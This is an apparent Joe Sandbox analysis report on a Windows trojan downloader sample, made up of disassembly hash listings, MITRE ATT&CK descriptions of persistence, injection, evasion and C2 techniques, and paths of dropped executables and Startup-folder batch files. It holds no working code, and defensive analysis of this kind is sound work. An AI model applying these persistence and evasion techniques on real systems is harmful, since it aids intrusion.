Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ddf0e9b89aee61b0d51497d393efbfdbe313b08fc5f1e7102739f7dfacc990
Instruction ID: 9f58c65b473ca55d6f187e0b1509454ae298eb0c399e224f4ff37b42b52c5710
Opcode Fuzzy Hash: f6ddf0e9b89aee61b0d51497d393efbfdbe313b08fc5f1e7102739f7dfacc990
Instruction Fuzzy Hash: 76213631B0021ACBDB58EB69C46477EB7A2BBC8644F144969E106EF3E5CF348E0287D5

Function 015308E6 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c46f383d84750995c77fb1fa81512c48457d489a9e9b390291d85b3b917c94
Instruction ID: e926577943db607aa745234e554ec99190c325e6a3d448bf6be338c175bb34ee
Opcode Fuzzy Hash: 11c46f383d84750995c77fb1fa81512c48457d489a9e9b390291d85b3b917c94
Instruction Fuzzy Hash: 45114731B0021ACBDB58EB69C46463E77A2BBC8740F144968E106EF3E5CF348D0287D5

Function 015308F9 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa0761481bb5a9b4e602d6419c15a653f4efc1d218c37aa1f4f8ee85ea99a22
Instruction ID: 7d7b45cdf18ee642b04ae4635504e59e795443bdcec86642d9cc272c660702da
Opcode Fuzzy Hash: 7aa0761481bb5a9b4e602d6419c15a653f4efc1d218c37aa1f4f8ee85ea99a22
Instruction Fuzzy Hash: EA115B31B0022ACBDB48EB69C46467E73A2BBD8744F144969E506EF3E1CF348D0287D5

Function 01531C90 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d398d1a45c4eeac1a3145dc8275bff1218344aa76e75dcba590d59c7236cd8c
Instruction ID: 9972a30d5df471d7b40db42f38ace3bf8edb6a239f2efba203d666417ff2e215
Opcode Fuzzy Hash: 9d398d1a45c4eeac1a3145dc8275bff1218344aa76e75dcba590d59c7236cd8c
Instruction Fuzzy Hash: 641126717083825FC306A738ADA999F7BF6EFC2250348856ED045CF256EE24DD058391

Function 0124D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4622817312.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_124d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
Instruction ID: 8a1b786cfe7acbc31f7f6a79bc1933a1938a5ef8b517ff4fde2e1708118c4179
Opcode Fuzzy Hash: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
Instruction Fuzzy Hash: 0611E172404244CFCB16CF44D5C0B16BF71FB94314F2482A9E9090B257C33AD45ACBA1

Function 01530848 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9859ccc0fb3a5f736575211c3caf66d2aded6c509555f39e783f21b582d65d
Instruction ID: 634c6ae63439bf295be43041f547b0c9928d724a7bdc088ae4ff37076cf33377
Opcode Fuzzy Hash: dc9859ccc0fb3a5f736575211c3caf66d2aded6c509555f39e783f21b582d65d
Instruction Fuzzy Hash: 4C011E35B003198BDB54AB69C8687BEB7A6BBC8700F144568E402BB3D5DF745D018BD1

Function 01531CC0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd336c9ca144aa866a0223608191d74a9c2fe8e5c254b69f841e44874ea1ecf
Instruction ID: 100e3fd3646be31d5cda22beb2a83d83620a8821247cfa1d522f744f6d805528
Opcode Fuzzy Hash: 2cd336c9ca144aa866a0223608191d74a9c2fe8e5c254b69f841e44874ea1ecf
Instruction Fuzzy Hash: 16F0AF71B002066BD71AB67AE8A996F77DAFBC4290380463DE509CB308EE70EC0187D0

Function 01531752 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2179a0bdab173520a7f2d1704fc89d75ac79b234b7ec920dd4277ea19f501e3
Instruction ID: 0165e460f30bfba3fa84adc4eaee6a006ac253a9c195baa513aaba556bfa666a
Opcode Fuzzy Hash: b2179a0bdab173520a7f2d1704fc89d75ac79b234b7ec920dd4277ea19f501e3
Instruction Fuzzy Hash: E60181357006068BDB16EB78E5906ADB3E3BFC8310B188529C5169F355DF71EC068B91

Function 0153156A Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 951db9fdb66c0304ec49469a8f5a42180b27269aabe869704159fb1bde3767b3
Instruction ID: b83a246c12fcf27fac54eff1902eba321af3f018ce676425398deaeb0af5cab2
Opcode Fuzzy Hash: 951db9fdb66c0304ec49469a8f5a42180b27269aabe869704159fb1bde3767b3
Instruction Fuzzy Hash: C6F068315047829BC3199779D82047E7BE6AEC626070886AEC54ADF651EE259C0587D1

Function 01530957 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6379029e0d0b9f34de29f7e40d2e830610e78e27619c11c743183c020f786cd
Instruction ID: 7484a45a62f39ba07516482e7230a9c13423f665e06eaf21c575ef71db2a1d24
Opcode Fuzzy Hash: b6379029e0d0b9f34de29f7e40d2e830610e78e27619c11c743183c020f786cd
Instruction Fuzzy Hash: EAF01931A1021ACBDB54AB69C46477EB7A2BBC8744F244929E102AF3E1CB7489018BD5

Function 015329F8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ef720f890794db7e78344c6ad5171de6efcd1b617a252d6f352c596821adc5
Instruction ID: 2eaf5523d2716870e65105d81d7973f301473860f0aabc59732b3f51e76a91c9
Opcode Fuzzy Hash: a0ef720f890794db7e78344c6ad5171de6efcd1b617a252d6f352c596821adc5
Instruction Fuzzy Hash: 5CE02B303052656FC34266AC98609AB37AAEFC63607050076E448CB382DD240C0643E1

Function 015317E8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d699b6187b04b07781dad0867c0d47de5d20ad14111c40c6673b3013ec842ce0
Instruction ID: 05f279eb9ea1e1760e3846f2220c6384cd9cb1393f942336678cd39e7fd653e8
Opcode Fuzzy Hash: d699b6187b04b07781dad0867c0d47de5d20ad14111c40c6673b3013ec842ce0
Instruction Fuzzy Hash: 0FE0D8333111985FD7072268A92457B3A6BEBC9612B090177F549C7395DD258D0693E1

Function 01531C30 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f219974645d3ba6e5fe1b61324ea55401c70faaf79c6a7ead461411a52e0be2
Instruction ID: 69034993f0c822006637c5869c01cee77cc811aaf8ec02fa735fd7fd16a6f06a
Opcode Fuzzy Hash: 1f219974645d3ba6e5fe1b61324ea55401c70faaf79c6a7ead461411a52e0be2
Instruction Fuzzy Hash: 62F0A07081A356AFC702DBB8E8A19CEBFB4EF46300F0540EED444D7152E6350E04D792

Function 01531C50 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57bfd1e614cd7a3afbca8b64dcadf792430891994093ad343f8100f0e35af1d3
Instruction ID: 751f07b3a5a6ca03d1cd7085eac06e1e7e76480804451c45e9ae98fb574c33a4
Opcode Fuzzy Hash: 57bfd1e614cd7a3afbca8b64dcadf792430891994093ad343f8100f0e35af1d3
Instruction Fuzzy Hash: 4BD05E70A1121EEFCB44EFB8E95199DF7F9EB44300B5041ADD808E3200EA322F00AB80

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\FMT2OeifGUTNfkZyqLG0jeEO.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hjnyt00.0xn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dsovqtg.oie.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31rh34q.ild.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwvgjly.hoh.ps1

C:\Users\user\AppData\Local\cl3vhpdkLtmoLXWJKBugbJDP.exe

C:\Users\user\AppData\Local\eTNltv0LYVQnDdBl6tKVEYLr.exe

C:\Users\user\AppData\Local\oqEo8V5wvVLKNc2VytL8EAsq.exe

C:\Users\user\AppData\Local\sOj9v5fBDMPcMK0zpX2B6CYH.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre